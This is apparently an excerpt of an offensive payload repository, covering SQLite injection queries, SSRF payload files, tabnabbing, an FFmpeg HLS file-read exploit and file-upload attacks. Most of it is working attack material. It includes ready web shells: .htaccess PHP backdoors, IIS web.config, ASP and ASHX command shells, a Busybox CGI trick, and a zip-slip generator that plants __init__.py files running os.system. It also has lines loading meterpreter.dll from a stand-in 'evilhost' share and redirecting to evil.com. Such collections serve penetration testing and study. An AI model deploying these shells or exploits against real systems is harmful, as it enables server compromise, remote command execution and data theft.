Database](#remote-command-execution-using-sqlite-command---attach-database) 14 | * [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension) 15 | * [References](#references) 16 | ## SQLite comments 17 | 18 | ```sql 19 | -- 20 | /**/ 21 | ``` 22 | 23 | ## SQLite version 24 | 25 | ```sql 26 | select sqlite_version(); 27 | ``` 28 | 29 | ## Integer/String based - Extract table name 30 | 31 | ```sql 32 | SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' 33 | ``` 34 | 35 | Use limit X+1 offset X, to extract all tables. 36 | 37 | ## Integer/String based - Extract column name 38 | 39 | ```sql 40 | SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name' 41 | ``` 42 | 43 | For a clean output 44 | 45 | ```sql 46 | SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name' 47 | ``` 48 | 49 | ## Boolean - Count number of tables 50 | 51 | ```sql 52 | and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table 53 | ``` 54 | 55 | ## Boolean - Enumerating table name 56 | 57 | ```sql 58 | and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number 59 | ``` 60 | 61 | ## Boolean - Extract info 62 | 63 | ```sql 64 | and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char') 65 | ``` 66 | 67 | ## Time based 68 | 69 | ```sql 70 | AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) 71 | ``` 72 | 73 | ## Remote Command Execution using SQLite command - Attach Database 74 | 75 | ```sql 76 | ATTACH DATABASE '/var/www/lol.php' AS lol; 77 | CREATE TABLE lol.pwn (dataz text); 78 | INSERT INTO lol.pwn (dataz) VALUES ('');-- 79 | ``` 80 | 81 | ## Remote Command Execution using SQLite command - Load_extension 82 | 83 | ```sql 84 | UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- 85 | ``` 86 | 87 | Note: By default this component is disabled 88 | 89 | ## References 90 | 91 | [Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf) 92 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/SSRF_expect.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/SSRF_url.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_ffmpeg.avi: -------------------------------------------------------------------------------- 1 | #EXTM3U 2 | #EXT-X-MEDIA-SEQUENCE:0 3 | #EXTINF:1.0 4 | http://ssrfevil.com 5 | #EXT-X-ENDLIST -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_iframe.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_css_import.svg: -------------------------------------------------------------------------------- 1 | 2 | 5 | 7 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_css_link.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | 6 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_image.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_use.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/Parser & Curl < 7.54.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Request Forgery/Images/Parser & Curl < 7.54.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_PDF.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Request Forgery/Images/SSRF_PDF.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_Parser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Request Forgery/Images/SSRF_Parser.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_stream.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Request Forgery/Images/SSRF_stream.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/WeakParser.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Request Forgery/Images/WeakParser.jpg -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/aws-cli.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Request Forgery/Images/aws-cli.jpg -------------------------------------------------------------------------------- /Server Side Template Injection/Images/serverside.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Template Injection/Images/serverside.png -------------------------------------------------------------------------------- /TWITTER.md: -------------------------------------------------------------------------------- 1 | # Twitter 2 | 3 | Twitter is very common in the InfoSec area. Many advices and tips on bug hunting or CTF games are posted every day. It is worth following the feeds of some successful security researchers and hackers. 4 | 5 | 6 | ### Accounts 7 | 8 | - [@Stök - Bug bounty hunter, cybersecurity educational content creator](https://twitter.com/stokfredrik) 9 | - [@NahamSec - Hacker & content creator & co-founder bugbountyforum and http://recon.dev](https://twitter.com/NahamSec) 10 | - [@dawgyg - Bug bounty hunter, reformed blackhat, Synack red team member](https://twitter.com/thedawgyg) 11 | - [@putsi - Bug bounty hunter and white hat hacker in Team ROT](https://twitter.com/putsi) 12 | - [@thecybermentor - Offers cybersecurity and hacking courses](https://twitter.com/thecybermentor) 13 | - [@InsiderPhD - PhD student, occasional bug bounty hunter & educational cyber security youtuber](https://twitter.com/InsiderPhD) 14 | - [@LiveOverflow - Content creator and hacker producing videos on various IT security topics and participating in hacking contests](https://twitter.com/LiveOverflow) 15 | - [@EdOverflow - Web developer, security researcher and triager for numerous vulnerability disclosure programs](https://twitter.com/edoverflow) 16 | - [@r0bre - Bug Hunter for web- and systemsecurity, iOS Security researcher](https://twitter.com/r0bre) 17 | - [@intigriti - European ethical hacking & bug bounty platform](https://twitter.com/intigriti) 18 | - [@Hacker0x01 - American bug bounty platform](https://twitter.com/Hacker0x01) 19 | - [@bugcrowd - Another american bug bounty platform](https://twitter.com/Bugcrowd) 20 | - [@hakluke - Bug bounty hunter, content creator, creator of some great pentesting tools like hakrawler](https://twitter.com/hakluke) 21 | - [@spaceraccoon - Security researcher and white hat hacker. Has worked on several bug bounty programs](https://twitter.com/spaceraccoonsec) 22 | - [@samwcyo - Full time bug bounty hunter](https://twitter.com/samwcyo) 23 | - [@Th3G3nt3lman - Security Reasearch & Bug bounty hunter](https://twitter.com/Th3G3nt3lman) 24 | - [@securinti - Dutch bug bounty hunter & head of hackers and bord member @ intigriti](https://twitter.com/securinti) 25 | - [@jobertabma - Co-founder of HackerOne, security researcher](https://twitter.com/jobertabma) 26 | - [@codingo_ - Global Head of Security Ops and Researcher Enablement bugcrowd, Maintainer of some great pentesting tools like NoSQLMap or VHostScan](https://twitter.com/codingo_) 27 | - [@TomNomNom - security researcher, maintainer of many very useful pentesting tools](https://twitter.com/TomNomNom) 28 | - [@orange_8361 - bug bounty hunter and security researcher, specialized on RCE bugs](https://twitter.com/orange_8361) 29 | - [@d0nutptr - part-time bug hunter, Lead Security Engineer at graplsec](https://twitter.com/d0nutptr) 30 | - [@filedescriptor - security researcher, bug hunter and content creator at 0xReconless](https://twitter.com/filedescriptor) 31 | - [@0xReconless - Security research, blogs, and videos by filedescriptor, ngalongc & EdOverflow](https://twitter.com/0xReconless) 32 | - [@pentest_swissky - Author of PayloadsAllTheThings & SSRFmap](https://twitter.com/pentest_swissky) 33 | -------------------------------------------------------------------------------- /Tabnabbing/README.md: -------------------------------------------------------------------------------- 1 | # Tabnabbing 2 | 3 | > Reverse tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. As the user was originally on the correct page they are less likely to notice that it has been changed to a phishing site, especially if the site looks the same as the target. If the user authenticates to this new page then their credentials (or other sensitive data) are sent to the phishing site rather than the legitimate one. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [More information about the vulnerability](#More-information-about-the-vulnerability) 9 | * [How to exploit](#How-to-exploit) 10 | * [How to hunt for it](#How-to-hunt-for-it) 11 | * [References](#references) 12 | 13 | ## Tools 14 | 15 | - [Discover Reverse Tabnabbing - Burp Extension](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30) 16 | 17 | ## More information about the vulnerability 18 | 19 | When tabnabbing, the attacker searches for links that are inserted into the website and are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, it checks that the link's `rel` attribute does not contain the value `noopener` and the target attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing. 20 | 21 | ## How to exploit 22 | ``` 23 | 1. Attacker posts a link to a website under his control that contains the following JS code: window.opener.location = "http://evil.com" 24 | 2. He tricks the victim into visiting the link, which is opened in the browser in a new tab. 25 | 3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website. 26 | 4. If the victim opens the background tab again and doesn't look at the address bar, it may happen that he thinks he is logged out, because a login page appears, for example. 27 | 5. The victim tries to log on again and the attacker receives the credentials 28 | ``` 29 | 30 | ## How to hunt for it 31 | 32 | As already mentioned, you have to search for the following link formats: 33 | 34 | ```html 35 | 36 | or 37 | 38 | ``` 39 | 40 | ## References 41 | 42 | - [Reverse Tabnabbing - OWASP, 20.10.20](https://owasp.org/www-community/attacks/Reverse_Tabnabbing) 43 | - [Tabnabbing - Wikipedia, 20.10.20](https://en.wikipedia.org/wiki/Tabnabbing) 44 | -------------------------------------------------------------------------------- /Upload Insecure Files/CVE Ffmpeg HLS/README.md: -------------------------------------------------------------------------------- 1 | # FFmpeg HLS vulnerability 2 | FFmpeg is an open source software used for processing audio and video formats. You can use a malicious HLS playlist inside an AVI video to read arbitrary files. 3 | 4 | ## Exploits 5 | ``` 6 | 1. `./gen_xbin_avi.py file:// file_read.avi` 7 | 2. Upload `file_read.avi` to some website that processes videofiles 8 | 3. (on server side, done by the videoservice) `ffmpeg -i file_read.avi output.mp4` 9 | 4. Click "Play" in the videoservice. 10 | 5. If you are lucky, you'll the content of `` from the server. 11 | ``` 12 | 13 | ## How it works (Explanations from neex - Hackerone links) 14 | the script creates an AVI that contains an HLS playlist inside GAB2. The playlist generated by this script looks like this: 15 | ``` 16 | #EXTM3U 17 | #EXT-X-MEDIA-SEQUENCE:0 18 | #EXTINF:1.0 19 | GOD.txt 20 | #EXTINF:1.0 21 | /etc/passwd 22 | #EXT-X-ENDLIST 23 | ``` 24 | To process a playlist ffmpeg concatenates all segments and processes it as single file. 25 | To determine the type of this file FFmpeg uses the first segment of the playlist. 26 | FFmpeg processes .txt files in a special way. It tries to show a screen capture of a tty printing this file. 27 | 28 | So, the playlist above will be processed as follows: 29 | FFmpeg sees #EXTM3U signature inside GAB2 chunk and determines file type as HLS playlist. 30 | The file GOD.txt doesn't even exist, but it's name is enough for FFmpeg to detect file type as .txt. 31 | FFmpeg concatenates the contents of all segments of the playlist. As only one of two segments actually exists, the result of concatenation is just the contents of the file we want to retrieve. 32 | Because the type of this concatenation is .txt, FFmpeg draws a tty that prints the file. 33 | 34 | ## Thanks to 35 | * [Hackerone - Local File Disclosure via ffmpeg @sxcurity](https://hackerone.com/reports/242831) 36 | * [Hackerone - Another local file disclosure via ffmpeg](https://hackerone.com/reports/243470) 37 | * [PHDays - Attacks on video converters:a year later, Emil Lerner, Pavel Cheremushkin](https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.p) 38 | * [Script by @neex](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py) 39 | -------------------------------------------------------------------------------- /Upload Insecure Files/CVE Ffmpeg HLS/gen_avi_bypass.py: -------------------------------------------------------------------------------- 1 | import struct 2 | import argparse 3 | 4 | AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST movi" 5 | 6 | 7 | def make_txt_packet(content, fake_packets=50, fake_packet_len=200): 8 | content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + content 9 | packet = b'00tx' + struct.pack(' 6 | Order allow,deny 7 | Allow from all 8 | 9 | 10 | # Make .htaccess file be interpreted as php file. This occur after apache has interpreted 11 | # the apache directoves from the .htaccess file 12 | AddType application/x-httpd-php .htaccess 13 | 14 | ###### SHELL ###### &1"); ?>###### LLEHS ###### 15 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo: -------------------------------------------------------------------------------- 1 | AddType application/x-httpd-php .htaccess 2 | # 3 | SetHandler server-status 4 | SetHandler server-info 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell: -------------------------------------------------------------------------------- 1 | # htaccess backdoor shell 2 | # this is relatively stealthy compared to a typical webshell 3 | 4 | # overriding deny rule 5 | # making htaccess accessible from the internet 6 | # without this you'll get a HTTP 403 7 | 8 | Require all granted 9 | Order allow,deny 10 | Allow from all 11 | 12 | 13 | # Make the server treat .htaccess file as .php file 14 | AddType application/x-httpd-php .htaccess 15 | 16 | # 17 | 18 | # To execute commands you would navigate to: 19 | # http://vulnerable.com/.htaccess?cmd=YourCommand 20 | 21 | # If system(); isnt working then try other syscalls 22 | # e.g. passthru(); shell_exec(); etc 23 | # If you still cant execute syscalls, try bypassing php.ini via htaccess 24 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Apache .htaccess/README.md: -------------------------------------------------------------------------------- 1 | # .htaccess upload 2 | 3 | Uploading an .htaccess file to override Apache rule and execute PHP. 4 | "Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded." 5 | 6 | Self contained .htaccess web shell 7 | 8 | ```python 9 | # Self contained .htaccess web shell - Part of the htshell project 10 | # Written by Wireghoul - http://www.justanotherhacker.com 11 | 12 | # Override default deny rule to make .htaccess file accessible over web 13 | 14 | Order allow,deny 15 | Allow from all 16 | 17 | 18 | # Make .htaccess file be interpreted as php file. This occur after apache has interpreted 19 | # the apache directoves from the .htaccess file 20 | AddType application/x-httpd-php .htaccess 21 | ``` 22 | 23 | ```php 24 | ###### SHELL ###### 25 | &1"); ?> 26 | ``` 27 | 28 | # .htaccess upload as image 29 | 30 | If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot. 31 | 32 | [Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In `.htaccess` ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid `.htaccess/image` polyglot. 33 | 34 | ```python 35 | # create valid .htaccess/xbm image 36 | 37 | width = 50 38 | height = 50 39 | payload = '# .htaccess file' 40 | 41 | with open('.htaccess', 'w') as htaccess: 42 | htaccess.write('#define test_width %d\n' % (width, )) 43 | htaccess.write('#define test_height %d\n' % (height, )) 44 | htaccess.write(payload) 45 | ``` 46 | or 47 | ```python 48 | # create valid .htaccess/wbmp image 49 | 50 | type_header = b'\x00' 51 | fixed_header = b'\x00' 52 | width = b'50' 53 | height = b'50' 54 | payload = b'# .htaccess file' 55 | 56 | with open('.htaccess', 'wb') as htaccess: 57 | htaccess.write(type_header + fixed_header + width + height) 58 | htaccess.write(b'\n') 59 | htaccess.write(payload) 60 | ``` 61 | 62 | ## Thanks to 63 | 64 | * [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html) 65 | * [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability) 66 | * [Writeup to l33t-hoster task, Insomnihack Teaser 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster) 67 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Busybox httpd.conf/README.md: -------------------------------------------------------------------------------- 1 | If you have upload access to a non /cgi-bin folder - upload a httpd.conf and configure your own interpreter. 2 | 3 | Details from Busybox httpd.c 4 | 5 | https://github.com/brgl/busybox/blob/abbf17abccbf832365d9acf1c280369ba7d5f8b2/networking/httpd.c#L60 6 | 7 | > *.php:/path/php # run xxx.php through an interpreter` 8 | 9 | > If a sub directory contains config file, it is parsed and merged with any existing settings as if it was appended to the original configuration. 10 | 11 | Watch out for Windows CRLF line endings messing up your payload (you will just get 404 errors) - you cant see these in Burp :) 12 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Busybox httpd.conf/httpd.conf: -------------------------------------------------------------------------------- 1 | *.sh:/bin/sh 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Busybox httpd.conf/shellymcshellface.sh: -------------------------------------------------------------------------------- 1 | echo "Content-type: text/html" 2 | echo "" 3 | echo `id` 4 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration IIS web.config/web.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | ") 23 | Response.write("

24 | 
")

25 | 
Set wShell1 = CreateObject("WScript.Shell")
26 | Set cmd1 = wShell1.Exec("whoami")
27 | output1 = cmd1.StdOut.Readall()
28 | set cmd1 = nothing: Set wShell1 = nothing

29 | 
Response.write(output1)
30 | Response.write("
31 |

32 | –> 33 | 34 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration IIS web.config/web.web.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 66 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-generate-init.py: -------------------------------------------------------------------------------- 1 | # Generating "evil" zip file 2 | # Based on the work of Ajin Abraham 3 | # Vuln website : https://github.com/ajinabraham/bad_python_extract 4 | # More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution 5 | 6 | # Warning 1: need a restart from the server OR debug=True 7 | # Warning 2: you won't get the output of the command (blind rce) 8 | import zipfile 9 | 10 | directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"] 11 | for d in directories: 12 | name = "python-"+d+"-__init__.py.zip" 13 | zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED) 14 | zipf.close() 15 | z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py") 16 | z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+ 17 | z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');") 18 | z_info.external_attr = 0o777 << 16 19 | z_file.close() 20 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/EICAR/eicar.txt: -------------------------------------------------------------------------------- 1 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.asa: -------------------------------------------------------------------------------- 1 | <% 2 | ' ******************************************************************************* 3 | ' *** 4 | ' *** Laudanum Project 5 | ' *** A Collection of Injectable Files used during a Penetration Test 6 | ' *** 7 | ' *** More information is available at: 8 | ' *** http://laudanum.secureideas.net 9 | ' *** laudanum@secureideas.net 10 | ' *** 11 | ' *** Project Leads: 12 | ' *** Kevin Johnson 14 | ' *** 15 | ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team 16 | ' *** 17 | ' ******************************************************************************** 18 | ' *** 19 | ' *** Updated and fixed by Robin Wood 20 | ' *** Updated and fixed by Tim Medin "1.2.3.4" then 47 | response.Status="404 Page Not Found" 48 | response.Write(response.Status) 49 | response.End 50 | end if 51 | 52 | if Request.Form("submit") <> "" then 53 | Dim wshell, intReturn, strPResult 54 | cmd = Request.Form("cmd") 55 | Response.Write ("Running command: " & cmd & "
") 56 | set wshell = CreateObject("WScript.Shell") 57 | Set objCmd = wShell.Exec(cmd) 58 | strPResult = objCmd.StdOut.Readall() 59 | 60 | response.write "

" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" 61 | 62 | set wshell = nothing 63 | end if 64 | 65 | %> 66 | 67 | Laundanum ASP Shell 68 | 69 |
70 | Command:
71 | 72 |

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. 73 |

Example command to do a directory listing:
74 | %ComSpec% /c dir 75 |

76 |
77 |
78 | Copyright © 2012, Kevin Johnson and the Laudanum team.
79 | Written by Tim Medin.
80 | Get the latest version at laudanum.secureideas.net. 81 |
82 | 83 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.ashx: -------------------------------------------------------------------------------- 1 | <% @ webhandler language="C#" class="AverageHandler" %> 2 | 3 | using System; 4 | using System.Web; 5 | using System.Diagnostics; 6 | using System.IO; 7 | 8 | public class AverageHandler : IHttpHandler 9 | { 10 | /* .Net requires this to be implemented */ 11 | public bool IsReusable 12 | { 13 | get { return true; } 14 | } 15 | 16 | /* main executing code */ 17 | public void ProcessRequest(HttpContext ctx) 18 | { 19 | Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl); 20 | string command = HttpUtility.ParseQueryString(url.Query).Get("cmd"); 21 | 22 | ctx.Response.Write("
Command:
"); 23 | ctx.Response.Write("
"); 24 | ctx.Response.Write("
");
25 | 
26 |     /* command execution and output retrieval */
27 |     ProcessStartInfo psi = new ProcessStartInfo();
28 |     psi.FileName = "cmd.exe";
29 |     psi.Arguments = "/c "+command;
30 |     psi.RedirectStandardOutput = true;
31 |     psi.UseShellExecute = false;
32 |     Process p = Process.Start(psi);
33 |     StreamReader stmrdr = p.StandardOutput;
34 |     string s = stmrdr.ReadToEnd();
35 |     stmrdr.Close();
36 | 
37 |     ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
38 |     ctx.Response.Write("
"); 39 | ctx.Response.Write("
